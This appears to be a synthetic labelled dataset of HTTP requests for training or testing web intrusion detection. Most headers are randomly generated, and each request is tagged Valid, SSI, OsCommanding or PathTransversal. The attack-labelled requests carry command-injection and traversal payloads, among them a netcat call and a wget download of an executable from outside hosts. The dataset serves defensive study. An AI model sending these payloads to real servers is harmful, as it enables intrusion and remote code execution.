User-Agent: njS.4SfAYG http://www.Elac2e.com
UA-CPU: x86
UA-Disp: 295,212,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 161x6409
Via: 7.8 www.iieu.htm:68718, HTTP/5.5 163.2.97.168
Transfer-Encoding: identity
Upgrade: eps/6.2, eey/6.2
Warning: 321 www.hrctezid.js "o2Tbr6utate" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 342559338014903
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rtdoa0iBcx4E=806999&@Sn-nJsAp7=niogh'dc&yniTuu5eGftss4s=nro9yl&yuosrs=tP.AR&RLDddoIDlu=qnaayathwd4sOiae&osRmwr=rneU2sinegeay 1sb|&srge=trih3hrmsystemMLmetae6wopenaa:&etcttowyas4r=tFaRab&sfd2ior=haqweh\kebgsound

End - Id: 5525
Start - Id: 40916
class: SSI
GET /Edtiishhnnzmhtm/IhssmaeEonnP4/eusaaej1twEdentNcrx.js?Rr=18344760&7wsk0tcwaezYesd=erXFont8M&Busrov4d=%3C%21--++%23odbc+connect%3D%229m%2Clio%2CCaa%22+++++++++statement%3D%22select+++++*++++from++i%22--%3E HTTP/1.0
Host: 77.108.222.245:7
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-9, macintosh;q=0.1, euc-cn;q=0.7, windows-1251;q=0.9, x-mac-arabic
Accept-Encoding: *;q=0.0
Accept-Language: ouenie-ds4;q=0.5, ginel-Uirer2;q=0.2, d1hinT-Oahn6u, ntdnid-s;q=0.2
Cache-Control: no-cache
Client-ip: 12.148.115.56
Cookie: ihleAeef=h5WjyVFoBhgA;nsrivr45s=742;osrp6=c9X_L0;hcevkfqttvmsita=e;mMirom7ijt=ipnhnMdrpxijnc
Cookie2: $Version="153"
Date: Mon, 25 Apr 05 14:26:39 UTC
ETag: "4DOTsaKeuKe20mWmkYac"
Expect: rep1c=eqeOqmar;smtnc3
From: 7tnz7e@rrkue5aod.it
If-Modified-Since: Wed, 30 Sep 09 23:19:52 UTC
If-Unmodified-Since: Thu, 28 May 09 06:54:55 GMT
If-Match: *
If-None-Match: "PSEzn77E@@YPz-fz"
If-Range: Sun, 08 Nov 09 08:31:55 CET
Max-Forwards: 343
MIME-Version: 9.9
Pragma: nii=tnieOy
Authorization: NTLM ZXV0Q24zdm90aXVhYW9neW9OZWx0c3J1aDdyaXN4YWJzNHNuZUU=
Range: -200220
Referer: http://sr1e.gov/ouenots.aspx
TE: gzip;q=0.3,trailers
Trailer: Accept-Encoding
User-Agent: ehdsson/9.5
UA-CPU: MIPS
UA-OS: Windows 95
UA-Color: color32
Via: 9.2 225.184.152.98, 8.4 254.44.132.63, HTTP/2.8 www.d2bieoio.htm
Transfer-Encoding: gzip
Upgrade: Oeoe/7.5, tls/2.6
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 175.203.115.62
X-Serial-Number: 163741114628927
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40916
Start - Id: 43199
class: OsCommanding
GET /0qJNZbGzN8PCW-7e/hep2@1b/eJtsLWZ/hfidj7sEeensptbauwg/e1whaqYmiheTss/4toottlptc6a/aC/ehLteitmtmdfO/XmaildOnullMZGccopy32s/documentyQYS/PwH.DkH683/yI6Z325Hqm2l_IPKEPxf.gif?ao7it3osaaLor=insertxhdeae+aq&oeojn5=dJykWwHdOTR&nullfNecho_=678&xtermewrSlacobjectG=%7C%2Fusr%2Fbin%2Fnc++++-vvv+++108.15.104.34++80%2500&jQgQPx=150101&l_stdinkru=3236879057 HTTP/1.0
Host: www.1t2enr.biz
Connection: keep-alive
Accept: text/plain;q=0.0, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nkat-eesoaW;q=0.0, is-yoatmwm5, 7nItn-9l0;q=0.9, let1-lee
Cache-Control: min-fresh=0
Client-ip: 111.24.12.133
Cookie: 8NKlog=ji;XM0h9=27;mndhiocef=105;rlmwiUzhsiel=iLJ@Z1
Cookie2: $Version="9"
Date: Sun, 06 Jul 08 04:35:48 UTC
ETag: W/"ZrsNZ8DCH0PWd7.VuP.4"
Expect: 100-continue
From: eena@eaooz.de
If-Modified-Since: Thu, 23 Sep 04 17:10:51 CET
If-Unmodified-Since: Mon, 19 Oct 09 19:05:18 GMT
If-Match: *
If-None-Match: "ILRIXSQ1HP8eRae@w"
If-Range: *
Max-Forwards: 4720
MIME-Version: 5.9
Pragma: lsad='tnIahtE'
Proxy-Authorization: neeoh eyo1ad=huxteEf
Authorization: Digest response="eEEfdE01115E366Bb9d4bCE6ad3de4E5"
Range: -40670,4905-
Referer: http://spuiadhe.fr/fsiano.jsp
TE: deflate;q=0.6,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/8.6 (Machintosh; U; PPC Mac OS X 3.2; ia-i0; rv:6.9.2) Gecko/07435261
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 953x846
Via: lejt9o/4.4 93.84.199.150, 0.2 www.tmghee.jpg, HTTP/3.9 www.Uean.css:1
Transfer-Encoding: gzip
Upgrade: hi11/1.2
Warning: 847 www.tiext.png "Tdlerisus4srfeotjRgn" 
X-Forwarded-For: 64.137.223.100
X-Serial-Number: 3512760212193
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43199
Start - Id: 43672
class: OsCommanding
GET ..%c1%8s...%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.Cnnwxr4aec.gov
Connection: keep-alive
Accept: video/mpeg, image/*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: min-fresh=3
Client-ip: 158.250.190.86
Cookie: Ignj=9Sur;whl6fsnl0R9er=hqo13bsode1i;wa7= mac;nestahnxaa=tt;Deryer3hrms5Tst=:p/:;yWRb_J0Mobject1=935
Cookie2: $Version="617"
Date: Sat, 29 Nov 08 23:53:20 CET
ETag: "y-vPzRAwL-5olCNDYBs"
Expect: 100-continue
From: r63aj@miwmhwde.ch
If-Modified-Since: Wed, 27 Feb 08 19:17:13 UTC
If-Unmodified-Since: Mon, 14 May 07 06:24:17 GMT
If-Match: "uZEImgwAnn6.GHfE8NC"
If-None-Match: "Awge4HWHkOQfguVPn-"
If-Range: Sun, 31 Jul 05 13:20:23 GMT
Max-Forwards: 2532
MIME-Version: 2.2
Pragma: t='t3maie'
Authorization: Basic cG40bnJ0Om1odG1wYw==
Referer: /rylsc/nllA6r/hloasa.mp3
TE: chunked;q=0.2,deflate
User-Agent: Mozilla/8.0 (Windows; U; Win 9x 8.4; p4-oc; rv:8.7.9) Gecko/05247312
UA-CPU: Sparc
UA-Pixels: 697x5821
Via: 5.6 40.21.55.90:554
Transfer-Encoding: identity
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 267 17.232.146.208 "uEwtOaeI" "Fri, 11 Sep 09 24:54:08 CET"
X-Forwarded-For: 129.156.147.149
X-Serial-Number: 84513190969177426
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43672
Start - Id: 26740
class: Valid
GET /pyenoa_oc8QO/lw04l@lQ9_E.tiff?la=https&qGiKaEQyW=e8tfnedtnnaytuts1a&hlentyninezn=n94ztWg%40vUHY&zstt7tSaieOt=a17OosgSttm3w&usseeyroEilg6lO=e3balhyecneid&coovoQaffa=dx8haccess_log&scriptnph-uu=490&binhW1iwdPjLhomeN=e&t0eTrAjh=sZeKS&aoaotphr=183861&noeoht0Heicd=5222826&3aduE4S2ennT=fwsAise&tcrno1rg=24223707&oqkatlxe=iyt&7xtur=OgenT HTTP/1.0
Host: www.bwodiZwns.cz:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: identity;q=0.5, deflate, compress, identity;q=0.6, compress;q=0.6
Accept-Language: Fxime5l-rhsaii;q=0.8, uaFw8at-g0e;q=0.2
Cache-Control: no-store
Client-ip: 29.30.138.88
Cookie: oh1taaYt1qirR=0998170468;ySo1wXxp_9jshutdownnr=~;9nh=wsng;bPC@5=ePh8PEpE.AoE
Cookie2: $Version="701"
Date: Tue, 12 May 09 23:46:36 GMT
ETag: W/"zKHC5oP1_ptrfqFVg"
Expect: 100-continue
From: slnt@rItzvIc.net
If-Modified-Since: Tue, 26 Oct 04 24:57:36 UTC
If-Unmodified-Since: Mon, 17 Sep 07 20:22:29 GMT
If-Match: "bcAuwutK3GNBz_4.idFY"
If-None-Match: *
If-Range: Thu, 16 Mar 06 24:02:21 CET
Max-Forwards: 577
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic aGV3U2NuOnNtMWdvcGU=
Authorization: NTLM ZW4wbm15aFViaW1yNG96cmFSemV3dzFvb3J1bm9nYXIzaw==
Range: 18782-,79-10,1-29104
Referer: http://auamj.cz/nyu40ei.png
TE: chunked,trailers,chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/2.1 (Windows; U; Win98 7.9; 9t-vb; rv:8.1.0) Gecko/62533556
UA-CPU: PowerPC
UA-Disp: 212,9655,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 358x270
Via: FTP/8.2 www.eUdaufrg.jpeg
Transfer-Encoding: identity
Upgrade: mrep/3.9, HDF/3.4, hmg/9.6, cFeer/0.4, nbtig/3.6
Warning: 653 www.rIlbwe.html:51762 "pn4htodnstaeHz" "Sat, 18 Dec 04 07:27:35 UTC"
X-Forwarded-For: 43.146.116.9
X-Serial-Number: 1194043277645
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26740
Start - Id: 639
class: Valid
GET /d9pUrnJo52N-3/5N/Nt74t/nzmopot/ietErnocets5/cliegtt.mdb? HTTP/1.1
Host: www.47oY.be
Connection: 8ruadh
Accept: */*
Accept-Charset: windows-1257;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=1
Client-ip: 117.71.190.235
Cookie: aSndeyret=tlodlnC:suwh6e;tr=rv44;tYincludew@k_gautoexecB=nehttps;DFWa=dropLGw;viEc7quul5s=3htaccestht;slxSd=wuba
Cookie2: $Version="43"
Date: Mon, 14 May 07 03:40:09 GMT
ETag: W/"Mv2YgpH-7wbdsBnv"
Expect: h3r9eig
From: ystebe@hnBteRt6v.be
If-Modified-Since: Sun, 07 Mar 04 02:55:38 GMT
If-Unmodified-Since: Fri, 11 Nov 05 01:09:33 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 26 Dec 07 07:48:14 GMT
Max-Forwards: 13
MIME-Version: 1.8
Pragma: uou=ou
Proxy-Authorization: NTLM all0bmFoaXVuYWNhYW9yNG8xYXdFbnJ0YXloNXNhT3NyYmFCb2VleXQ=
Authorization: Digest nc=cbBAf31F
Range: 0-,76-659886
Referer: /sE0eti.msf
TE: deflate;q=0.5,gzip;q=0.1,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.6 (compatible; imcoji; SunOS sun4u; tuaihoTo; ttazsldes)
UA-CPU: x86
UA-Disp: 2226,321,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1676x432
Via: 6.8 www.vihl.htm, 7.5 6.193.172.50
Transfer-Encoding: identity
Upgrade: leEya/2.8, m3dun/4.8, eaig/9.5
Warning: 786 www.jw5tieNi.jpg "h22R" 
X-Forwarded-For: 120.114.184.187
X-Serial-Number: 541499677250739
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 639
Start - Id: 45791
class: PathTransversal
GET /nZ7wofDzwA-P0RPn/sqr2QNR_9omvOaMk/erLoe/dHaefhtellui/fh5UwwK6XaDD4friOpz/ePFhkY15tsP8/vbscriptadminxterm-TCZ/pHVS/n2ERuIp9ujzzhlF.tiff?0CIXO=replaceOms&b5ohhn=962155492&9eeltoycsolc=%7Ecmdraa&p0GdEl=gv%5Dye5a+dq&h7osmamunWtnw0=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fto%2Faron%2Friisll%2Friicntrode.exe&lue=5yp8%25&oet9sesiD=9Dx5ZS&tzr1s08ond6=esr&aeoeicitdeat=Noaua6d+o&uaeemve4gm=zn%3Bxo%3A+metai+&gahe5d9l=bodynr+mor&includegqB6BkG=4859&GuhttpsL4_u=ina5&6unes9t=ustdin5k4%40gey+&ira7doas=xo%40FVv.yK HTTP/1.0
Host: 74.136.162.0:35
Connection: close
Accept: */*
Accept-Charset: windows-1250, x-mac-chinesesimp;q=0.3, big5, cp-932
Accept-Encoding: *
Accept-Language: ta-32Gnb;q=0.9, uevokaT-5dbwiT4, tFrxDhO-t, utut-oospbh
Cache-Control: only-if-cached
Client-ip: 40.147.120.92
Cookie: 66tyb=639;0AiframedeIh8usrZ9=6;p9aef0odseanh6o=erU
Cookie2: $Version="80"
Date: Sat, 28 Aug 04 14:56:22 CET
ETag: "1UYXYoyn1ISOZ-ytTEbk"
Expect: 100-continue
From: tehZutuc@dllzd.uk
If-Modified-Since: Wed, 19 Jul 06 24:34:04 GMT
If-Unmodified-Since: Tue, 19 Jul 05 15:42:05 CET
If-Match: ".lNbtNaNX-GY@JWd"
If-None-Match: "tm2vALpcmhbfa@eOmu"
If-Range: *
Max-Forwards: 5873
MIME-Version: 2.9
Pragma: Bihebek=odi0ia
Proxy-Authorization: attk esmu5=OSiF3tt
Authorization: nt9ro ihteu=d6nton
Range: 855-
Referer: /lxaR/e7nt7hn/rnrdbriq/Tmnetb/sh9s8.asmx
TE: trailers,chunked
Trailer: Accept-Language
User-Agent: Sytet/5.9.0.8
UA-CPU: PowerPC
UA-Disp: 4288,202,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 9422x259
Via: 9.3 150.184.72.220, HTTP/0.9 www.aRrRc.jpeg:5595, 0.7 229.182.187.118
Transfer-Encoding: tieim; tened7e=alw8x9
Upgrade: F3awa4/4.3, 9rim7/0.4, reilie/2.8, 3il/4.5, Stse/6.1
Warning: 610 192.1.135.3:2396 "ysstaeiltotrenks" "Sun, 26 Mar 06 18:59:14 UTC"
X-Forwarded-For: 110.58.93.193
X-Serial-Number: 06918680418533
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45791
Start - Id: 4016
class: Valid
PUT /rMwsitaguapzde4trao/GQ5Igroup byB5y/sgtta/padkMLr8HM.KOIV0R/B0SP.6.gif? HTTP/1.0
Content-Length: 185
Content-Language: umem,ri1lr,nikrgnr
Content-Encoding: deflate
Content-Location: http://www.bpBat.it/7ldt/aila/vuaha/snczosy.jpeg
Content-MD5: dHRhdDhhZTByM2ZsaGVpcg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 21 Jan 05 15:16:06 GMT
Last-Modified: Sat, 10 Jun 06 09:43:23 GMT
Host: 81.254.207.33
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-8859-7, x-mac-chinesesimp, windows-874
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=31
Client-ip: 64.234.96.201
Cookie: sam.GGl=82352303
Cookie2: $Version="7"
Date: Sun, 01 Aug 04 10:31:28 UTC
ETag: "o1qvhU2H71Tkj2vS9"
Expect: tair
From: erOso4A0@Obex.be
If-Modified-Since: Tue, 16 Nov 04 17:09:28 CET
If-Unmodified-Since: Fri, 20 Nov 09 14:28:30 UTC
If-Match: "fOyDTqEaq3GJwENYk9D"
If-None-Match: *
If-Range: *
Max-Forwards: 94
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: tvSo3 l1oo=dbetatzy
Authorization: feqo io6ne=i6yEsEt
Range: 555712-,-798,88743-
Referer: /ahyoJws/e4ipinx.js
TE: gzip;q=0.2,trailers
Trailer: Trailer
User-Agent: Mozilla/3.7 (Machintosh; U; PPC 8.1; vg-dr; rv:9.1.1) Gecko/43538557
UA-CPU: MIPS
UA-Disp: 055,684,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 242x137
Via: FTP/5.5 192.17.184.92:7350, HTTP/2.1 147.98.8.249, 3.2 188.65.137.190:16435
Transfer-Encoding: qOkd4b
Upgrade: oeLob/1.5, p4rvo/8.7, r8nc/7.6, akd/5.3, Oa6eds/9.9
Warning: 557 www.uatTo.png "emmsfj6abd" "Sat, 17 Apr 10 07:43:49 GMT"
X-Forwarded-For: 96.77.6.216
X-Serial-Number: 198262
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~

gK_o5ko=Hha5&efecidesfoIs=script/sseu2ieand4&3yvbscripth=16858&Gsndq=2gnl2Hwir&El=dbtoa2eeEsWhcATs&V56baAgT.=347&7d=akjsyw&V-o7=(ihrcsagAr>htnmeslogn&un783n2=112362&xiftlnys=ifhzs

End - Id: 4016
Start - Id: 28145
class: Valid
GET /t0cdd.tV2Z/dD.bin?iSzrrueos=71470&euroCIra9tEtso=xpzL54NzUm&B1kmWXFB=75&e0fnrh=2837514246&tela=qVEFwysnkiF&Nool7cgTciba=52428269&njYLvTXuNbody=doee&92p0ttsrlEaLg=eiseval%25wps&sijasn=975672 HTTP/1.1
Host: www.1tmw.net:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, identity;q=0.4
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 183.104.243.127
Cookie: Lessnet=q1.vAje;Ddbii=eubn5;Taemiw=e;at67iirC=knan7eosR;aStTlOhayl=9
Cookie2: $Version="3"
Date: Mon, 01 Aug 05 07:15:03 CET
ETag: "Wm06YaSQbDuvvD.K77RN"
Expect: qtreytw=GsptS;pim2t
From: EcseaglP@o4oECcb.st
If-Modified-Since: Thu, 05 Nov 09 01:30:32 CET
If-Unmodified-Since: Thu, 04 Mar 10 10:09:20 UTC
If-Match: *
If-None-Match: "T.YTiDGW_0iZefTewTs"
If-Range: *
Max-Forwards: 4334
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM aDZlbzlMNmNuc20wb2g2cGF0YkF3b3dld2NiTzlub2hldA==
Authorization: Digest nonce
Range: 1-,700067-,-09153
Referer: /ermerd/l3ene/eeilnadx/eqjEg/iyecV.asmx
TE: chunked;q=0.5,trailers,trailers
Trailer: Accept
User-Agent: eRtaMi0iiTcIn
UA-CPU: Sparc
UA-Disp: 166,4722,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4261x691
Via: HTTP/4.0 www.e95N.css:6, sa1qee/8.2 www.isrohusr.tiff
Transfer-Encoding: q9tf
Upgrade: jei/1.9, 4ernhe/9.9
Warning: 821 169.183.205.45 "uorwsi4qi" "Sun, 12 Mar 06 21:00:13 UTC"
X-Forwarded-For: 53.152.98.70
X-Serial-Number: 28548763
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28145
Start - Id: 43129
class: OsCommanding
GET /fo6tgkaa/u%u0form8FfUboot.ini4Mboy/zd/tBXm_2wJ-vAZ/zVuicL/e1KD5kV/3Aqw2GabYH/hadoaamedddrhnvl/iNohoo3pehfsisa/oATFKUPfEVqJseW/3tlhsnkrievnNms/iG-nRAWljZyk3x.mpJ7.msf?alLaAfhoTL=oG%40uKj%408qaH&zwnhPes=30&ysRusel5eetuay=909&olelauletnzsg=+&yibD@45=03215499&chtn0xJ=8nekhc2sIlu&Nztn8fmqes=5810660&pmalw8=52654&cblso3gPmp=%5Cn+++wget+++http%3A%2F%2F156.110.122.19%3A0372%2Fnftp.exe&QhdVBQr=navCioreelikesdod&eseuasie=srsntraul+sn%25script&8aaeEemtho1=Dan&Uqoeairstf=ouall HTTP/1.1
Host: 108.228.211.136:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: min-fresh=563
Client-ip: 147.97.228.238
Cookie: 6RhMf=2427831642;1gVg=4twhere;ksdi=e~
Cookie2: $Version="87"
Date: Fri, 26 May 06 03:07:29 UTC
ETag: W/"j5PMXW@J9gNIgeb4CyoO"
Expect: 100-continue
From: ndud@rzo8frE.cz
If-Modified-Since: Mon, 09 Aug 04 08:16:29 UTC
If-Unmodified-Since: Tue, 31 Aug 04 16:56:28 UTC
If-Match: "@rIN0HX-gcKeZgt"
If-None-Match: "8QkM.A7FvH_bt4lB"
If-Range: "3xBgA5RRYnUytdbLlJ"
Max-Forwards: 4
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: qgem2 pmastofe=hwHts
Authorization: imra7f ihefhw=mt9ah
Range: 94856-,22-022
Referer: /do2pk9a.mdb
TE: chunked;q=0.8,chunked;q=0.5,trailers
Trailer: Authorization
User-Agent: Mozilla/3.1 (X11; U; Open BSD i586 4.4; Ef-Cn; rv:7.9.3) Gecko/11706404
UA-CPU: Sparc
UA-Disp: 5887,6465,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 556x187
Via: 0.2 www.ieas8Tn.jpg, 6.0 142.98.198.175, urfon/7.8 88.245.106.96
Transfer-Encoding: eeetm
Upgrade: ftb/0.9, eeti/9.1
Warning: 169 190.90.41.27 "mteulHh6dilaof" 
X-Forwarded-For: 209.100.60.54
X-Serial-Number: 231798615796568
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43129
Start - Id: 14236
class: Valid
GET /ufma/Xo8Aupdate4js8B8iframeH2L/hoothe5o/icsuAiiZirterx5eree/ru@Di0g._fYVT@/e-xmoZcx7hyu/eJ7kC/cuH/0leineAes5s.jpeg?4tin=ly&ewmi=8190305307&8elDybn=7960341&wYaC82=41&1lswaqzDftiieaw=wN_55zJ0&al4lalHb=xshutdown+&xeFIo4rh=Wetceu&1rpj4w1lo3=8tbrunHi&csosrf=ons3shutdown&%uMVH0=4ut1&3obd6i84hrocmb=14806464&tdltsShde7dtDya=ftdhtaccesiilr HTTP/1.0
Host: 92.8.16.114:99
Connection: close
Accept: image/gif;q=0.0, image/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, gzip, compress;q=0.2, gzip;q=0.6
Accept-Language: dMyi-f5, a-s5gc
Cache-Control: no-store
Client-ip: 217.57.174.13
Cookie: btpgmtT=?s-oe[jrcpyc\h;Casock_streamXO0tmp9=jDnIcnOd
Cookie2: $Version="64"
Date: Sat, 17 Jun 06 01:16:02 UTC
ETag: W/"AeZN8RZMmoUH4hCBsnaF"
Expect: 100-continue
From: ytnpe@aitntig.fr
If-Modified-Since: Sat, 01 Aug 09 02:01:32 GMT
If-Unmodified-Since: Mon, 10 Jan 05 01:57:59 UTC
If-Match: *
If-None-Match: "s60cuC287BQhojTh@j"
If-Range: *
Max-Forwards: 487
MIME-Version: 0.5
Pragma: ls=tfeytr
Proxy-Authorization: NPoh rEbi=eefingh
Authorization: Digest opaque="ie0geb"
Range: -901847,5-685
Referer: http://i3Up.biz/zaie5/set1l/eTan/emo9u1.php
TE: chunked;q=0.1,trailers,trailers
Trailer: Accept-Encoding
User-Agent: dO9GGGeJGl http://www.vhlBoire.ch
UA-CPU: MIPS
UA-Disp: 985,925,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 962x171
Via: cyAc/4.5 73.251.135.175:0711, 8.7 www.EedsQ.htm
Transfer-Encoding: compress
Upgrade: nemhde/8.2, tex32o/1.6, 6cPmot/5.9, eiypMx/6.4
Warning: 616 154.56.254.74 "ansu3dtaabmzoDoqtefe" 
X-Forwarded-For: 177.22.102.112
X-Serial-Number: 21052565504410930240
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14236
Start - Id: 9539
class: Valid
GET /ioeihlIthe5mo7ddl/evntYihrratendamiLi/nYvMTdbZ1DYHF./temTgpyKV/ulAl_s5mrsystem/ulh1smtxngusIt4eh.mspx? HTTP/1.0
Host: www.nyl5o.it
Connection: sHkc
Accept: video/*;q=0.0, text/*;q=0.8
Accept-Charset: x-mac-chinesesimp;q=0.5, x-mac-roman, x-mac-roman;q=0.9, euc-cn
Accept-Encoding: 
Accept-Language: n-s2ted, Rcir5Uo-t
Cache-Control: no-cache
Client-ip: 213.232.44.132
Cookie: ubsksr=ibi'cadd- jorfl;aosoadaRdee2=0;notisedcb1oere=mb0vs;dewzmkah3be=01
Cookie2: $Version="430"
Date: Mon, 08 Mar 10 14:50:30 CET
ETag: W/"@ooEB@uaCNN9tFEzz0"
Expect: HoueTiw
From: anp51@cLdyyihltw.st
If-Modified-Since: Wed, 01 Dec 04 16:09:33 UTC
If-Unmodified-Since: Tue, 15 Jan 08 14:32:09 GMT
If-Match: "twqlIPm-Tlu.dIvL"
If-None-Match: "18.sQk.e01H5.N4cJd"
If-Range: Mon, 24 Jan 05 07:00:47 GMT
Max-Forwards: 5
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest uri=http://wotOwyth.de/SaOoudi/Oooe/hwdos4ni/0vrssema/4mBs.php4
Authorization: Basic b29qdE5qdDo1c0VpRWk=
Range: -473707,-784763,883586-54671
Referer: http://www.eEew.biz/sdiew/dheim.jsp
TE: chunked,trailers
Trailer: Expect
User-Agent: Mozilla/4.8 (compatible; Konqueror/2.6; Linux i386; ieaks; rdgceesi9C)
UA-CPU: 68000
UA-Disp: 389,574,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1124x1179
Via: 2.4 www.9oiearla.js, 5.6 www.to3at.htm, 2.4 www.0aeps2.png
Transfer-Encoding: gzip
Upgrade: zZr/7.6, ri9ps3/0.6
Warning: 724 1.186.0.197:4 "pvtse" 
X-Forwarded-For: 107.141.77.183
X-Serial-Number: 2426894
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9539
Start - Id: 43724
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.1
Host: www.aslwaoum.st
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-cyrillic;q=0.6, isiri-3342, iso-8859-2, x-mac-arabic, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale=6169
Client-ip: 105.144.118.141
Cookie: tzddhpp7onteean=rg;eaoN1tdlh=75;@sY11bfck2GZ=eaeagp9ureaccepth;2tinqplqiTel=2116;bduMtt6ostG=ilwmh
Cookie2: $Version="378"
Date: Thu, 26 Aug 04 08:05:45 CET
ETag: W/"3BJWUYYJ2ACJTUS@l"
Expect: 100-continue
From: uhbqiisi@rmieagr.org
If-Modified-Since: Mon, 26 Jan 09 15:58:05 GMT
If-Unmodified-Since: Sun, 29 May 05 24:17:33 GMT
If-Match: "6MjIJR6DEMj0ukCJPmRB"
If-None-Match: *
If-Range: Wed, 20 Jan 10 14:21:11 CET
Max-Forwards: 224
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic aXp0aTphM3RMaXJ0
Range: 7008-71
Referer: http://www.rihl1nrI.de/odaI8eg.shtml
TE: chunked,trailers,chunked;q=0.3
User-Agent: esEneam/2.8.0.5
UA-CPU: 68000
UA-Disp: 603,315,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 337x2229
Via: HTTP/6.5 www.ngmt.jpg:66
Transfer-Encoding: identity
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 140 www.rnisshet.gif "tr2eit" 
X-Forwarded-For: 251.245.152.34
X-Serial-Number: 601406
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43724
Start - Id: 16965
class: Valid
GET /ytaPa/1h0ai8uqplhggewtek2u/wcR4ulhhr5edljenstL/dTyQgGn6NiHf1-Y0MmR@.gif?znt7l=enoftllhgoIedl&meq=069402592&4ll682=enleeesdlfs2n&oty9qfi6a=82925798&XQg3bFnVyT4access_log=eeaqC%25nboarb&Ltrw5u2=rieOh&Tgh=kt8ou&SwscriptIl0M=purste&thwlipjDjuntie=x7QKAh4k4WC&yponaet=fosq HTTP/1.0
Host: 223.54.82.137:8
Connection: close
Accept: */*
Accept-Charset: ks_c_5601-1987, windows-1254;q=0.3, windows-1251
Accept-Encoding: *;q=0.6
Accept-Language: sp-t;q=0.9, lJ-4hhssdE, tn2eko-o, rdn-ko0mh, Op-hmlhhhhh
Cache-Control: no-store
Client-ip: 211.46.212.72
Cookie: 8tnrvett5z7jl=Eh+rQeEqbodyea;ztttm=vqKysQ4
Cookie2: $Version="72"
Date: Tue, 07 Sep 04 17:30:59 CET
ETag: W/"4Kup4QLCScUMVBaUb"
Expect: AImN=jti7;neefaadl=rfs3EU
From: ayu0@0si1euu.fr
If-Modified-Since: Thu, 08 Dec 05 23:13:47 CET
If-Unmodified-Since: Thu, 14 Jul 05 09:32:03 CET
If-Match: "Qk7lAY2ulo1rXnNu2c"
If-None-Match: "zJCUJx_.RX7ONv@fD"
If-Range: *
Max-Forwards: 9956
MIME-Version: 9.9
Pragma: tn=iaertB
Proxy-Authorization: Digest uri=http://www.tajkhset.st/gasMoui/toyh/lii7/qoo0p4S/taaetS.msf
Authorization: Digest opaque="irombpO"
Range: 26-084
Referer: /nsho.mpeg
TE: chunked;q=0.2,chunked;q=0.4
Trailer: Trailer
User-Agent: r0ckcxrm9t
UA-CPU: 68000
UA-Disp: 704,5793,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6606x753
Via: 6.0 63.152.252.18
Transfer-Encoding: gzip
Upgrade: dmEs/2.6, 33oae/3.4
